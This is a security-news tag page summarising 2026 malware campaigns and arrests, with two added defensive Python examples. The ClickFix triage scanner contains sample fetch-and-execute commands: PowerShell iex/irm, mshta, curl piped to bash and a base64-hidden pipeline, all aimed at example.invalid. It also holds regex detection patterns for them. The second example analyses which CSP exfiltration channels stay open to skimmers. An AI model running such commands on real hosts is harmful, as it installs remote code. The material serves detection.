Tag: malware
-
Fake VS Code alerts on GitHub spread malware to developers
A large-scale campaign is targeting developers on GitHub with fake Visual Studio Code (VS Code) security alerts posted in the Discussions section of various projects, to trick users into downloading malware. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/fake-vs-code-alerts-on-github-spread-malware-to-developers/
-
Hackers Target South Asian Financial Firm with BRUSHWORM and BRUSHLOGGER Attacks
A South Asian financial institution has been hit by a custom malware toolkit combining a modular backdoor, dubbed BRUSHWORM, and a DLL side-loaded keylogger known as BRUSHLOGGER. The attackers relied on a backdoor initially named paint.exe and a keylogger masquerading as libcurl.dll, neither of which used advanced packing or obfuscation. BRUSHWORM acts as the primary implant, handling…
-
Hackers Deploy USB Malware, RATs, and Stealers in Southeast Asian Government Attacks
A multi-cluster cyberespionage operation saw attackers use USB-propagated malware, multiple RATs, loaders, and a custom stealer against a Southeast Asian government organization between June and August 2025. Analysts initially observed USB-borne malware dubbed USBFect (also known as HIUPAN), which spreads through removable drives and deploys the PUBLOAD backdoor for lateral movement. Further telemetry revealed two…
-
Breach Roundup: Tycoon2FA Phishing Platform Rebounds
Tags: 2fa, attack, breach, data, data-breach, healthcare, iran, malware, north-korea, oracle, phishing, ransomware, russia
Also, Russian Signal Phishing, Iran-Linked Malware, Breaches in Spain and France. This week: Tycoon 2FA, Trio-Tech, messaging app spying and a ransomware broker sentenced. Iran-linked hackers. Mazda disclosed a breach. Oracle patched a flaw. North Korean actors weaponized VS Code, a Spanish port ransomware attack, a French teacher data breach and a healthcare firm victim…
-
LiteLLM Hit in Cascading Supply-Chain Attack
Stolen Credentials From Trivy Breach Let Hackers Push Malware to PyPI. Threat group TeamPCP exploited credentials stolen in the Trivy breach to push malicious versions of LiteLLM to PyPI, exposing developers to credential theft, persistent backdoors and lateral movement tools within hours of publication. First seen on govinfosecurity.com Jump to article: www.govinfosecurity.com/litellm-hit-in-cascading-supply-chain-attack-a-31210
-
Alleged RedLine malware developer extradited to US, faces up to 30 years
Hambardzum Minasyan appeared in an Austin federal court on Tuesday and was indicted on charges of conspiracy to commit access device fraud, conspiracy to violate the Computer Fraud and Abuse Act and conspiracy to commit money laundering. First seen on therecord.media Jump to article: therecord.media/redline-malware-developer-extradited-to-us-faces-30-years
-
New ClickFix Attack Exploits Windows Run Dialog and macOS Terminal to Deploy Malware
Threat actors are standardizing a powerful ClickFix-based attack that abuses the Windows Run dialog box and macOS Terminal to deliver malware while sidestepping traditional browser protections. Insikt Group has tracked five distinct ClickFix activity clusters active since at least May 2024, with lures impersonating brands such as Intuit QuickBooks and Booking.com. Using Recorded Future’s HTML…
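ClickFix lures end with the victim pasting a command into the Run dialog (Windows) or Terminal (macOS), which leaves a host artifact (the RunMRU registry key, shell history) even though the browser never fetched a payload. The following is an added example, not code from Insikt Group or the article: a small triage scanner that runs a set of ClickFix-style indicators over constructed sample RunMRU values and shell-history lines, and decodes an echo-to-base64-to-shell one-liner to reveal the hidden command. The sample commands and the example.invalid host are constructed for illustration.

```python
import base64
import re

# Constructed sample artifacts (not from the article): Windows RunMRU values and
# macOS shell-history lines, mixing benign entries with ClickFix-style commands.
SAMPLE_RUN_HISTORY = [
    "notepad.exe",
    'powershell -w hidden -nop -c "iex (irm https://example.invalid/fix.ps1)"',
    "mshta https://example.invalid/verify.hta",
    "calc",
]

# Build the encoded payload programmatically so the sample is guaranteed to decode.
_HIDDEN = b"curl -fsSL https://example.invalid/a | bash"
SAMPLE_SHELL_HISTORY = [
    "ls -la",
    f"echo '{base64.b64encode(_HIDDEN).decode()}' | base64 -d | bash",
    "curl -fsSL https://example.invalid/update.sh | bash",
    "git status",
]

# Indicator rules, ordered from most to least specific. Each is a (name, regex) pair.
INDICATORS = [
    ("powershell_hidden_download_exec",
     re.compile(r"powershell[^\n]*(-w(indowstyle)?\s+hidden|-enc\w*|\biex\b|\birm\b|"
                r"invoke-expression|downloadstring)", re.I)),
    ("mshta_remote", re.compile(r"\bmshta(\.exe)?\s+https?://", re.I)),
    ("curl_pipe_shell", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b", re.I)),
    ("base64_decode_pipe_shell",
     re.compile(r"base64\s+(-d|--decode)\s*\|\s*(ba|z)?sh\b", re.I)),
    ("osascript_remote", re.compile(r"\bosascript\b.*https?://", re.I)),
]

# Captures the base64 blob in an "echo '<b64>' | base64 -d" pipeline.
B64_ECHO = re.compile(r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(-d|--decode)", re.I)


def decode_echoed_payload(line):
    """Return the decoded command hidden behind an echo|base64 -d pipeline, or None."""
    m = B64_ECHO.search(line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def scan_commands(lines, source):
    """Return one finding per line that matches an indicator; benign lines yield nothing."""
    hits = []
    for n, line in enumerate(lines):
        for name, rx in INDICATORS:
            if rx.search(line):
                hit = {"source": source, "index": n, "rule": name, "command": line}
                decoded = decode_echoed_payload(line)
                if decoded is not None:
                    hit["decoded"] = decoded
                hits.append(hit)
                break  # one finding per line is enough for triage
    return hits


def scan_all():
    """Scan both constructed artifact sources and return the combined findings."""
    return (scan_commands(SAMPLE_RUN_HISTORY, "RunMRU")
            + scan_commands(SAMPLE_SHELL_HISTORY, "shell_history"))


if __name__ == "__main__":
    for hit in scan_all():
        print(hit)
```

On a real host the RunMRU values come from HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU and the shell history from the user's ~/.zsh_history or ~/.bash_history; the rules are deliberately narrow (remote fetch piped into an interpreter, hidden PowerShell with download-and-execute verbs), so tune them against your own baseline before alerting on them.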
-
New PXA Stealer Malware Targets Banks, Uses Telegram to Exfiltrate Data
CyberProof researchers have detected a 10% surge in PXA Stealer attacks targeting financial institutions in Q1 2026. Learn… First seen on hackread.com Jump to article: hackread.com/financial-firms-rise-pxa-stealer-attacks/
-
Second RedLine infostealer operator ends up in US custody
Tags: malware
Hambardzum Minasyan, an Armenian man extradited to the United States, is accused of conspiring with others to develop and operate the RedLine infostealer malware used to steal … First seen on helpnetsecurity.com Jump to article: www.helpnetsecurity.com/2026/03/26/redline-infostealer-developer-extradited-us-charged/
-
Sophisticated PlugX campaign uses the current Middle East conflict as bait
Shortly after the outbreak of armed hostilities in the Persian Gulf region, threat actors were already exploiting the conflict for a cyberattack campaign. Security researchers at ThreatLabz have been observing, since 1 March 2026, a new cyberattack delivering a PlugX backdoor variant. Building on the tools, techniques and procedures uncovered in the multi-stage campaign, the analysts at…
-
GhostClaw AI Malware Targets macOS Users with Credential-Stealing Payloads
GhostClaw is a multi-stage macOS infostealer that now abuses both GitHub and AI-assisted development workflows to harvest credentials and deploy secondary payloads, significantly widening its potential victim base. Jamf Threat Labs has since expanded on this work, uncovering at least eight additional samples hosted in GitHub repositories that impersonate trading bots, SDKs, and developer tools.…
-
Iran war exploited for malware-infected business communications
Since the end of February 2026, Bitdefender Labs have been registering a noticeable increase in cyberattacks in the Middle East. First seen on it-daily.net Jump to article: www.it-daily.net/it-sicherheit/cybercrime/iran-krieg-malware-geschaeftskommunikation
-
GitHub phishers use fake OpenClaw tokens to drain crypto wallets
Smart, obfuscated malware code: According to OX, the malicious phishing and wallet-stealing code is “highly obfuscated” and resides within the “eleven.js” JavaScript file in the repository. The threat actor used “watery-compost[.]today” to host a C2 server to collect information (including wallet address, transaction value, and name) and drain wallets once they were connected. Commands used by…
-
Suspected Hijacked Developer Accounts Spread npm Malware
Sonatype uncovers a sophisticated malware campaign using hijacked npm developer accounts to steal API keys and passwords. Is your dev environment at risk? First seen on hackread.com Jump to article: hackread.com/suspected-hijacked-developer-accounts-npm-malware/
-
Suspected RedLine infostealer malware admin extradited to US
Tags: malware
An Armenian suspect was extradited to the United States to face criminal charges for allegedly helping manage RedLine, one of the most prolific infostealer malware operations in recent years. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/suspected-redline-infostealer-administrator-extradited-to-us/
-
Torg Grabber Malware Shifts from Telegram Exfiltration to Encrypted REST API for C2
A fast-evolving information-stealing malware dubbed “Torg Grabber” has shifted from simple Telegram-based exfiltration to a hardened, encrypted REST API command-and-control (C2) channel fronted by Cloudflare. The operation surfaced when a 747 KB 64-bit sample initially tagged as Vidar was found to be fundamentally different from known Vidar builds, exposing an internal debug string “grabber…
-
Fake Screenshot Lures Target Web3 Support Staff with Multi-Stage Malware Attack
Fake screenshot links are being used to quietly deploy a multi-stage backdoor against Web3 customer support teams, in a campaign assessed to be linked to the Chinese financially motivated group APT-Q-27 (GoldenEyeDog). The operation abuses live chat workflows, signed .NET loaders, AWS S3 dead drops, and DLL sideloading to land a memory-resident Farfli backdoor that…
-
Kiss Loader Malware Targets with Early Bird APC Injection in New Attack Campaign
A newly identified malware loader dubbed “Kiss Loader” is emerging as a potential threat, leveraging advanced process injection techniques and dynamic delivery infrastructure. The loader, still under active development at the time of discovery, demonstrates a blend of stealth, modular staging, and experimental implementation, suggesting it may evolve into a more mature attack tool. When…
-
Preventing Account Takeovers: A Practical Guide to Detection and Response
Yesterday’s password leak can become tomorrow’s identity crisis. According to research firm Gitnux, account-takeover attacks jumped 354 percent in 2023, driven by bots that replay stolen credentials and infostealer malware that sidesteps multi-factor prompts. The fallout (billions in fraud losses, shaken customer trust, and security teams scrambling) demands a clear plan. In this article, we:…
-
WebRTC Skimmer Bypasses CSP to Steal Payment Data from E-Commerce Sites
Cybersecurity researchers have discovered a new payment skimmer that uses WebRTC data channels as a means to receive payloads and exfiltrate data, effectively bypassing security controls. “Instead of the usual HTTP requests or image beacons, this malware uses WebRTC data channels to load its payload and exfiltrate stolen payment data,” Sansec said in a report published…
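The reason the skimmer gets past CSP is that connect-src governs fetch, XHR and WebSocket, and img-src governs image beacons, but neither covers a WebRTC peer connection; the only CSP control for that channel is the separate webrtc directive ('allow' or 'block') defined in CSP Level 3, which is not honoured by every browser and so is defence in depth rather than a fix. The following is an added example, not code from Sansec or the article: a small CSP parser that applies the first-directive-wins rule and reports, for a constructed weak header and its hardened form, which of the three exfiltration channels the policy actually restricts. The header strings and the cdn.example.invalid host are constructed for illustration.

```python
# Constructed policies (not from the article). The weak one locks down connect-src and
# img-src yet says nothing about WebRTC; the hardened one adds the CSP3 webrtc directive.
WEAK_CSP = ("default-src 'self'; script-src 'self' https://cdn.example.invalid; "
            "connect-src 'self'; img-src 'self'")
HARDENED_CSP = WEAK_CSP + "; webrtc 'block'"


def parse_csp(header):
    """Split a CSP header into {directive: [source expressions]}.

    Per the spec, when a directive appears more than once only the first occurrence
    is enforced, so later duplicates are ignored here too.
    """
    policy = {}
    for raw in header.split(";"):
        tokens = raw.strip().split()
        if not tokens:
            continue
        name, values = tokens[0].lower(), tokens[1:]
        policy.setdefault(name, values)
    return policy


def _restricted(values):
    """A fetch directive restricts a channel only if it exists and is not wildcarded."""
    if values is None:
        return False
    return not any(v in ("*", "http:", "https:", "ws:", "wss:") for v in values)


def exfil_channels(header):
    """Return, per exfiltration channel, whether the policy restricts it."""
    policy = parse_csp(header)

    def effective(directive):
        # Fetch directives fall back to default-src when absent; webrtc does not.
        return policy.get(directive, policy.get("default-src"))

    return {
        "fetch_xhr_websocket": _restricted(effective("connect-src")),
        "image_beacon": _restricted(effective("img-src")),
        # Only an explicit "webrtc 'block'" stops peer connections; connect-src is irrelevant.
        "webrtc_data_channel": policy.get("webrtc") == ["'block'"],
    }


def open_channels(header):
    """Names of the channels a skimmer could still use under this policy."""
    return sorted(name for name, restricted in exfil_channels(header).items() if not restricted)


if __name__ == "__main__":
    print("weak     :", open_channels(WEAK_CSP))
    print("hardened :", open_channels(HARDENED_CSP))
```

Run against your own production header to see whether the WebRTC channel is covered at all; if you do add webrtc 'block', test every legitimate use of WebRTC on the site first (support chat widgets are a common one), because the directive blocks all peer connections, not just malicious ones.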
-
Microsoft Unveils New Guidance to Detect and Defend Against Trivy Supply Chain Attack
Tags: attack, credentials, cve, cyber, malware, microsoft, supply-chain, threat, tool, vulnerability
Aqua Security’s vulnerability scanner, Trivy, suffered a sophisticated CI/CD supply chain compromise. The threat actor, identified as TeamPCP, leveraged prior incomplete remediation to inject credential-stealing malware into official releases. This incident, tracked as CVE-2026-33634, successfully weaponized a trusted security tool against the organizations relying on it to stay safe. This visualizes the attack propagation timeline…
-
Fake VS Code Security Alerts on GitHub Spread Malware in Massive Phishing Attack
A large-scale phishing campaign is actively targeting developers on GitHub by abusing the platform’s Discussions feature to distribute fake Visual Studio Code (VS Code) security alerts. The campaign appears highly coordinated, with thousands of near-identical posts discovered across multiple repositories, indicating automated mass exploitation rather than isolated abuse. Attackers are creating GitHub Discussions with alarming…
-
Delve did the security compliance on LiteLLM, an AI project hit by malware
LiteLLM offers an AI open source project used by millions that was infected by credential harvesting malware. First seen on techcrunch.com Jump to article: techcrunch.com/2026/03/25/delve-did-the-security-compliance-on-litellm-an-ai-project-hit-by-malware/
-
Alleged RedLine infostealer conspirator extradited to US
Tags: malware
The Armenian man faces three counts for his role for allegedly administering “one of the most prevalent infostealing malware variants in the world.” First seen on cyberscoop.com Jump to article: cyberscoop.com/alleged-redline-infostealer-conspirator-extradited-to-us/
-
An Evolving GlassWorm Malware is Making the Rounds of Code Repositories
Threat researchers with various vendors have for the past year been tracking the efforts of a bad actor dubbed GlassWorm, known for dropping malicious extensions in code registries like npm, Open VSX, PyPI, and Microsoft’s Visual Studio Marketplace with the aim of stealing secrets and cryptocurrency. This month, threat researchers wrote about a resurgence in…
-
Mirai Malware Evolves into Hundreds of Variants Driving Botnet Growth
Mirai malware evolves into hundreds of variants, driving botnet growth, including Aisuru and KimWolf, powering large-scale attacks, and increasing risks to vulnerable IoT devices worldwide. First seen on hackread.com Jump to article: hackread.com/mirai-malware-variants-botnet-growth/
-
New Torg Grabber infostealer malware targets 728 crypto wallets
A new info-stealing malware called Torg Grabber is stealing sensitive data from 850 browser extensions, more than 700 of them for cryptocurrency wallets. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/new-torg-grabber-infostealer-malware-targets-728-crypto-wallets/

